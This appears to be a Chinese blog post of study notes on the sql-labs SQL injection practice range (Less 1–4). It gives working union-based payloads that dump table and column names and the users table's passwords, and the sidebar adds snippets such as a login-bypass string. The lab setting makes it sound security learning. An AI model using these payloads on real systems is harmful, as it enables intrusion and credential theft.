sql-labs

最新推荐文章于 2024-05-26 21:07:50 发布
最新推荐文章于 2024-05-26 21:07:50 发布
阅读量239 收藏
点赞数
分类专栏: 笔记 文章标签: sql mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62782839/article/details/121125834
版权

sql注入

补充知识
注入时通常需要用到MySQL中的information_schema数据库名
table表名 table_name table_schema
在这里插入图片描述

columns 表中(字段名)table_name table_name
在这里插入图片描述

有所有的默认表
需要一些MySQL的增删改查语句,加之一些联合查询语句
***扩展文字***limit的作用,进行分页

sql注入的条件

1 需要有用户端的输入行为
2 需要有输入端的sql语句拼接在sql程序中,用户端输入与MYSQL数据库有交互。

sql-labs 解题

sql注入一般分为两种类型,一种是数字型,一种是字符型
在这里插入图片描述
首先打开这个sql-labs的less 1,please input the id,输入ID来进行测试,首先输入ID=1
在这里插入图片描述
接下来,ID=2,测试会有几行,这里可以看到ID=15后面是没有输出的,在测试id=10,测试出共有十四行。在这里插入图片描述
测试注入的符号,使用单引号,双引号,括号等测试。
注意报错的提示语句,在这里插入图片描述
这里使用的是单引号,发现它进行了报错,’‘14’’ LIMIT 0,1’ at line 1,语句前面会使用单引号进行引用,故只需要看单引号中的内容。
根据错误来判断sql语句,单引号注入,先使用单引号进行闭合
–+或者–加空格进行注释
即 ‘ID=1’select 12–+’

字段查询

使用 order by进行查询
注意 注意 注意
联合查询语句只能查询一个结果,故前面的语句必须为假,即ID=-1,之后再加联合查询语句
在这里插入图片描述
进行字段数查询
在这里插入图片描述
在这里插入图片描述
可知字段数在这里插入图片描述
在第一行的第二列和第三列可以进行注入
在这里插入图片描述
获取用户名和数据库名称
?id=-1’(结果为假)union联合语句只能执行一个结果
id=-1’ union select 1,user(),database()–加号或者空格
group_concat函数用于连接查询结果
在这里插入图片描述
这是表名查询的结果。
?id=-1’union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=“security”),3–+
进行字段查询
在这里插入图片描述
?id=-1’ union select 1, (select group_concat(column_name)from information_schema.columns where table_name=‘users’),3–+
接着查询users表中字段username和password
在这里插入图片描述
http://localhost:8080/Less-1/?id=-1’ union select 1,2,group_concat(password)from users–+
在这里插入图片描述
成功获得用户名和密码

在这里插入图片描述
less 2
在这里插入图片描述

输入id=1’ 进行报错,发现多出一个单引号
试用and1=1 和and 1=2 ,如果是字符型这两条语句全部转换为真,如果是数字型,1=2为假,无结果
在这里插入图片描述
在这里插入图片描述

less 3 进行报错测试
单引号,括号,反斜杠等
id=1’
在这里插入图片描述
‘1’’)limit 0,1
多单引号以及括号,可以进行闭合尝试
如下图
在这里插入图片描述

LESS 4
在这里插入图片描述
基于错误进行判断
在这里插入图片描述
可以使用”)进行闭合尝试
在这里插入图片描述

less 5

时~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs 详解
m0_52314120的博客
03-28 1908
文章目录前言一、第一关1.and 1=2测试 :2.尝试闭合:3.尝试将 ‘ 注释4.利用order by函数爆字段数5.设置错误的id值使其通过报错带出查询结果6.判断回显点7.查询当前库名与用户8.联合查询爆库名9.爆表名10.查询user下的列名11.从username和password中得到账号密码二、第二关总结 前言 sql-labs的注入样例 若有不足请留言指正 一、第一关 1.and 1=2测试 : http://127.0.0.1/sql/Less-1/?id=1 2.尝试闭合: 127
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sql-labs靶场环境搭建(手把手保姆级教学)
最新发布
焦虑的焦虑
05-26 1972
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL-labs/less1通关教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
Sqli-Labs.zip
07-15
对前四道题目进行加强,输出在数据库中构成的查询语句,有利于新手快速入门SQLi;
sqli-labs实验环境
05-08
此实验环境包含常见的sql注入漏洞,适用于网络安全初学者,加深了解SQL注入产生的原因,以及如何修复sql注入漏洞
sql-labs(1-65)
Yb_140的博客
03-05 6098
目录 Less-1 Less-2 Less-3 Less-4 Less-5 Less-6 Less-7 Less-8 Less-9 Less-10 Less-11 Less-12 Less-13 Less-14 Less-15 Less-16 Less-17 Less-18 Less-19 Less-20 Less-21 Less-22 Less-23 Less-24 Less-25 Less-25a Less-26 Less-26a Less-2.
sql-labs(1~4)
qq_53142368的博客
03-13 2689
学习目标: sql-labs 靶场基础练习 学习内容: sql-labs 靶场1~4关 学习时间: 2021年3月7日~2021年3月13日 学习产出: 前言 说出来满满都是泪呀 /(ㄒoㄒ)/~~ 我的靶场一直搭建不好,tmd,PHP study下载好了,并且在db-creds.inc里的用户地址也改为了本地127.0.0.1(localhost) 但是在打开靶场,发现打不开题(知道有多难受么)知道最近才问学长,同学,才发现是自己的PHP study版本太高了,这里就又出现一个问题,哎,我下载了好几个版本
sql-labs学习
weixin_64286326的博客
02-08 2205
前言: 年前学习过sql的知识,现在忘得差不多了,趁这个机会赶紧在复习一下。 1 万能密码 在mysql里面 -- # 他们都代表注释 我们在登陆框内输入账号密码,服务器会在数据库内进行查询,大概是这样 select * FROM user WHERE username= '111' AND password= '222' 假如我们在登录框内的username填写 1' or 1=1# 效果是这样 SELECT * FROM user WHERE username= '1'
sql-labs(1-8关)
2302_80935968的博客
04-17 2131
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
sqli-labs (less-60)
kukudeshuo的博客
03-17 654
sqli-labs (less-60) 进入60关,直接输入 http://127.0.0.1/sql1/Less-60/?id=1' 页面正常,输入 http://127.0.0.1/sql1/Less-60/?id=1" 根据错误信息判断闭合方式为")–+,并且为字符型注入 因为有完整错误信息,所以这里我们使用报错注入攻击 查看当前库 http://127.0.0.1/sql1/Less-60/?id=1") and updatexml(1,concat(0x7e,(database()),0x
sql-labs通关
热门推荐
whisper921的博客
03-05 1万+
less 1—单引号字符型注入 字符型注入,单引号 通过随机输入id得知用户名和密码,网址后面接?id=1 判断 Sql 注入漏洞的类型:1.数字型 2.字符型 用 and 1=1 和 and 1=2 来判断: 1.Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。 2.Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 ,页面运行错误,则说明此 Sql 注入为数字型注入。 .
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值